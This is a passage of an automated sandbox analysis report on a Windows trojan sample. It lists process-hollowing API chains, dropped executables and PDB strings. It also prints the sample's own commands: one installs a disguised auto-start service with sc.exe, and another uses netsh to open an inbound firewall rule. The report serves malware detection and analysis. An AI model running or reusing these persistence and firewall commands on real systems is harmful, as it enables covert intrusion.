                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00570110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 9_2_006F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: A332.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: FB58.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: BB8A.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: E3A9.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 9889.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: E3A9.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: E3A9.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: E3A9.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: E3A9.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 6C37.exe.5.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                      Source: 9889.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 9889.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 9889.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 9889.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: ECD2MpEBSf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jgdhbuaJump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@58/27@91/19
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: ECD2MpEBSf.exeVirustotal: Detection: 36%
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\ECD2MpEBSf.exe "C:\Users\user\Desktop\ECD2MpEBSf.exe"
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeProcess created: C:\Users\user\Desktop\ECD2MpEBSf.exe "C:\Users\user\Desktop\ECD2MpEBSf.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\jgdhbua C:\Users\user\AppData\Roaming\jgdhbua
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaProcess created: C:\Users\user\AppData\Roaming\jgdhbua C:\Users\user\AppData\Roaming\jgdhbua
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BB8A.exe C:\Users\user\AppData\Local\Temp\BB8A.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6816 -ip 6816
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CCB2.exe C:\Users\user\AppData\Local\Temp\CCB2.exe
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6816 -s 520
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D936.exe C:\Users\user\AppData\Local\Temp\D936.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qeprvgom\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description qeprvgom "wifi internet conection
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start qeprvgom
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d"C:\Users\user\AppData\Local\Temp\D936.exe"
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A332.exe C:\Users\user\AppData\Local\Temp\A332.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CADF.exe C:\Users\user\AppData\Local\Temp\CADF.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\jgdhbua C:\Users\user\AppData\Roaming\jgdhbua
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D502.exe C:\Users\user\AppData\Local\Temp\D502.exe
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaProcess created: C:\Users\user\AppData\Roaming\jgdhbua C:\Users\user\AppData\Roaming\jgdhbua
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E3A9.exe C:\Users\user\AppData\Local\Temp\E3A9.exe
                      Source: C:\Users\user\AppData\Local\Temp\CADF.exeProcess created: C:\Users\user\AppData\Local\Temp\CADF.exe C:\Users\user\AppData\Local\Temp\CADF.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FB58.exe C:\Users\user\AppData\Local\Temp\FB58.exe
                      Source: C:\Users\user\AppData\Local\Temp\E3A9.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeProcess created: C:\Users\user\Desktop\ECD2MpEBSf.exe "C:\Users\user\Desktop\ECD2MpEBSf.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BB8A.exe C:\Users\user\AppData\Local\Temp\BB8A.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CCB2.exe C:\Users\user\AppData\Local\Temp\CCB2.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D936.exe C:\Users\user\AppData\Local\Temp\D936.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaProcess created: C:\Users\user\AppData\Roaming\jgdhbua C:\Users\user\AppData\Roaming\jgdhbua
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6816 -ip 6816
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6816 -s 520
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qeprvgom\
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description qeprvgom "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start qeprvgom
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BB8A.tmpJump to behavior
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00419B15 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6876:64:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:64:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3716:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6816
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4652:120:WilError_01
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCommand line argument: 0.0
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCommand line argument: hijaduvinijebup
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCommand line argument: mocisacatenu
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCommand line argument: wapejan
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCommand line argument: wovag
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCommand line argument: cbH
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCommand line argument: Piruvora
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCommand line argument: gukafipa
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCommand line argument: mawecamaxe
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCommand line argument: Hiwejanoji
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCommand line argument: Pusazide
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCommand line argument: hukujid
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCommand line argument: cbH
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCommand line argument: cbH
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCommand line argument: cbH
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCommand line argument: cbH
                      Source: 3D34.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3D34.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: A4DE.exe.5.dr, Univesity_Grade_Calculator/Form1.csCryptographic APIs: 'CreateDecryptor'
                      Source: 18.0.3D34.exe.ec0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 18.0.3D34.exe.ec0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 18.0.3D34.exe.ec0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 18.0.3D34.exe.ec0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 18.2.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 18.2.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 18.0.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 18.0.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: ECD2MpEBSf.exeStatic PE information: More than 200 imports for KERNEL32.dll
                      Source: ECD2MpEBSf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: ECD2MpEBSf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: ECD2MpEBSf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: ECD2MpEBSf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: ECD2MpEBSf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: ECD2MpEBSf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: ECD2MpEBSf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: BB8A.exe, 0000000C.00000000.759454697.0000000000413000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.765793505.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000010.00000002.807243826.0000000004DE0000.00000002.00020000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: r*;\C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdbh source: CCB2.exe, 0000000F.00000000.768135951.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.777349843.00000000049D7000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: C:\nobaniz_sakalacato34.pdbh source: ECD2MpEBSf.exe, 00000000.00000002.667356464.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000000.00000000.661810290.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000001.00000000.664620927.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000000.751866281.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000002.758107473.0000000000401000.00000020.00020000.sdmp, jgdhbua, 0000000B.00000000.755033215.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: ;C:\bajudag\zexi\yedu49\hecicu\2-tiwi\cabilok\fes.pdbh source: D936.exe, 00000011.00000000.776580962.0000000000401000.00000020.00020000.sdmp, krmdinzg.exe, 00000020.00000000.795753078.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.778942214.0000000000B3E000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.777377914.0000000000B3E000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
